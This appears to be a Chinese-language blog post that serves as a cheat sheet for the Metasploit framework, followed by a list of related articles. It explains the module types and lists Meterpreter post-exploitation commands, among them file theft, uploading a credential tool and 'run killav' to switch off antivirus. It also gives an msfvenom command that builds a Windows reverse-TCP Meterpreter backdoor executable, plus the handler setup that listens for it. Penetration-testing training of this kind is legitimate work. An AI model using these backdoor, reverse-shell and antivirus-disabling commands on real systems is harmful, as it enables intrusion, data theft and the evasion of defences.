MSF工具

最新推荐文章于 2024-04-04 12:49:44 发布
最新推荐文章于 2024-04-04 12:49:44 发布
阅读量578 收藏
点赞数
分类专栏: 漏洞整理 文章标签: 渗透测试工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nigo134/article/details/123702026
版权

模块介绍

它是一个渗透测试框架(模块介绍)
auxiliary:辅助模块,辅助渗透(端口扫描、登陆密码爆破、漏洞验证等)
exploits(exp):漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。
命名规则:操作系统/各种应用协议分类
payloads:攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码
post:后渗透阶段模块,漏洞利用成功获得meteroreter之后,向目标发送的一些功能性指令,如提权等。
encoders:编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵检测和过滤系统。
evasion:躲避模块,用来生成免杀payload
nops:由于IDS/IPS会检查数据包中不规则的数据,在某些情况下,比如针对溢出攻击,某些特殊滑行字符串(NOPS x90x90)则会因为被拦截而导致攻击失效。

后渗透

Meterpreter后渗透-常用命令

meterpreter > background 放回后台
meterpreter > exit       关闭会话
meterpreter > help 帮助信息
meterpreter > sysinfo 系统平台信息
meterpreter > screenshot 屏幕截取
meterpreter > shell 命令行shell (exit退出)
meterpreter > getlwd 查看本地目录
meterpreter > lcd 切换本地目录
meterpreter > getwd 查看目录meterpreter > ls查看文件目录列表meterpreter > cd 切换目录
meterpreter > rm 删除文件
meterpreter > download C:\\1.txt 1.txt下载文件
meterpreter > upload /var/www/wce.exe wce.exe上传文件
meterpreter > search -d c: -f *.doc搜索文件
meterpreter > execute -f cmd.exe -i执行程序/命令
meterpreter > ps 查看进程
meterpreter > getuid 查看当前用户权限
meterpreter > run killav关闭杀毒软件meterpreter > run getgui-e启用远程桌面
meterpreter > portfwd add -l 1234 -p 3389 -r <目标lP>端口转发

msfvenom生成后门木马

生成木马文件:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.xxx.xxx lport=4444 -f exe -o shell.exe

监听:

use exploit/multi/handler
set payload winows/meterpreter/reverse_tcp
set lhost 192.168.xxx.xxx
set lport 4444
run/exploit

nigo134
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSF渗透必用工具-就是一个漏洞框架,kali自带
weixin_46248422的博客
06-21 1599
1.kali桌面超时的设置方法 鼠标右击选择应用程序-设置-light桌面管理器-杂项,设置为从不。 2.物理机与虚拟机在同一个网络一般使用桥接模式。 3.渗透攻击:是指
渗透工具MSF系列培训教程(共17课)10-17课
06-20
第1课:什么是Metasploit 第2课:如何安装Metasploit 第3课:如何更新MSF及其结构 第4课:msf用户接口及核心命令 第5课:Exploits模块 第6课:payloads模块 第7课:利用MSF攻击windows 第8课:三个模块作用 第9课:msfcli命令接口 第10课:msfweb命令接口 第11课:msfd命令接口 第12课:msfpayload和msfencode接口 第13课:MSF数据库后台命令 第14课:autopwn命令 第15课:meterpreter plyload 第16课:vncinject payload 第17课:MSF实战应用演示
MSF工具使用方法和工具用途
weixin_44843084的博客
06-19 1509
包含了常见的漏洞利用模块和生成各种木马。 msfconsole -h #显示在msfconsole初始化的选项和参数 http://www.nctry.com/916.html 1.msfconsole #进入msfconsole 框架 2.search ms12-020 #搜索ms12-020漏洞(search ms) 3.use auxiliary/dos/windows/rdp/ms12_020_maxchannelids #使用这个漏洞(
MSF(Metasploit Framework)详细介绍及用法【新手篇】
最新发布
h1008685的博客
04-04 2011
MSF核心组件介绍,MSF常用模块介绍【exploit,payload,auxiliary,post-exploitation,encoder,nops,evasion】基础命令【启动msf,数据库管理,查找和使用模块,配置模块,执行模块 ,会话管理,辅助命令,系统命令】MSf初始配置【初始化数据库,创建/切换/删除工作区,扫描数据,查看扫描结果】
渗透测试工具MSF
2303_77223717的博客
07-08 1035
Metasploit Framework 简称MSF,是一款开源的安全漏洞检测工具。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台,集成数千个漏洞利用、辅助测试模块。
渗透测试工具之Metasploit Framework(MSF
weixin_50904074的博客
03-15 1734
Metasploit是当前信息安全与渗透测试领域最流行的术语,它的出现颠覆了以往的已有的渗透测试的方式。几乎所有流行的操作系统都支持Metasploit,而且Metasploit框架在这些流行的系统上的操作基本上都是一样的。Metasploit 框架(Metasploit Framework ,MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。
metasploit-framework工具
10-09
MSF漏洞测试工具 使用方法: 根据漏洞名称搜索 : search ms17_010 设置模块:use auxiliary/scanner/smb/smb_ms17_010 设置目标地址:set rhosts x.x.x.x 设置好了之后,run或者exploit 进行攻击
php-msf源码详解
01-21
我们来看分享下具体源码:php-msf: https://github.com/pinguo/php-msf 源码解读也做了一段时间了, 总结一下自己的心得: 抓住 生命周期, 让代码在你脑海中 跑起来 分析架构, 关键字 分层 边界 隔离 一个好的框架,...
浅谈MSF渗透测试
02-24
渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、...
三菱环境清除工具 三菱PLC环境清除工具 三菱PLC编程软件卸载清楚工具
03-19
三菱PLC编程软件安装后有问题打不开,可以用这个卸载
【常用工具MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
热门推荐
Fighting_hawk的博客
03-27 2万+
1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞。
内网渗透工具MSF使用教程
CC__Faker的博客
04-01 2611
MSF介绍 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 常见指令 use[exploits/payloads/auxiliary] //指定一个模块并使其开始工作 show[exploits/payloads/auxiliary/options] //显
内网渗透msf工具详解
鸣蜩十四的博客
08-10 1931
一.文件目录 date目录 存储数据 documentation目录 文档目录 lib目录 存储ruby脚本 modules目录 存储模块和插件 tools目录 存储小工具 二.基础使用 msfdb init 初始化并启动数据库 db_status 查看数据库状态 msfconsole 控制台 (可以使用kage实现界面化) help 帮助 exit 退出 show 进行罗列模板 search 搜索模块名或cve编号 back 返回上一级 info 查看模块具体信息 show options 查看需要配
MSF(Metasploit)渗透测试---黑客工具使用指南
kuokay的博客
06-07 6204
渗透测试者的困扰:在众多相同类型的工具,丌知道如何选择。认为需要掌插数百个工具软件,上千个命令参数,实在记丌住。新出现的漏洞 POC/EXP 有丌同的运行环境要求,准备工作繁琐。大部分时间都在学习丌同工具的使用习惯,如果能统一就好了,迚而 Metasploit 就产生了。POC,全称”Proof of Concept”,中文“概念验证”,常挃一段漏洞证明的代码。EXP,全称”Exploit”,中文“利用”,挃利用系统漏洞迚行攻击的劢作。 Metasploit 框架是可以添加漏洞代码片段,就好比一个军火库,
渗透工具——kali中msf简介(以及MSF的基本使用方法)
2301_78006725的博客
09-02 5562
设置payload:set payload windows/x64/meterpreter/reverse_tcp。1. 使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue。设置模块:use auxiliary/scanner/smb/smb_ms17_010。攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。在MSF中,一个模块是指MSF框架中所使用的一段软件代码组件。设置目标地址:set RHOSTS [目标地址]
MSF 详解
m0_72125469的博客
05-19 4287
The Metasploit Framework 的简称。MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。msfvenom是msfpayload和msfencode的组合。将这两个工具集成在一个框架实例中。
渗透测试工具msf简单操作
LWH___的博客
09-09 5905
分享给大家共同学习 如有任何问题建议联系li963734430@163.com
MSF框架渗透工具常见的一些用法
weixin_43836806的博客
07-15 623
1.扫描存活主机 利用的漏洞有 auxiliary/scanner/discovery/arp_sweep 2.探测存活主机的端口 对某网段内的主机的指定端口进行扫描,并查看是否可以利用: 例如:对某一网段的smb445端口进行探测,利用的漏洞为 auxiliary/scanner/smb/smb_version 3.攻击利用:首先查看存活的主机的端口中是否存在弱口令(为主动的攻击做准备) 例如:对应smb445端口开放了,我们就可以试着去看看有没有弱口令 ...
蓝胖子攻击·kail利用msf工具对MS12-020漏洞进行渗透测试·使用XP,kali
weixin_48060069的博客
11-12 406
实验过程 1.安装运行环境 版本:windows:VMware,mac版本:VirtualBox。 2.下载安装XP 2.1在官网上选择相应的版本,并将文件存储在文稿中。 2.2 启动Virtualbox,选择新建 --> 接下来的步骤: A.名称为XP, 32-bit 内存大小:512MB B.选择:现在创建虚拟硬盘 VID 动态分配 10GB C. 点击“设置” > “存储” > “没有盘片” > 点击“分配光驱”右边的光盘图标 > “选择一个
ubuntu安装软件安装msf工具
03-12
在Ubuntu上安装Metasploit Framework(MSF工具可以通过以下步骤完成: 1. 打开终端(Ctrl+Alt+T)。 2. 更新软件包列表,输入以下命令并按下回车键: ``` sudo apt update ``` 3. 安装依赖软件包,输入以下...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值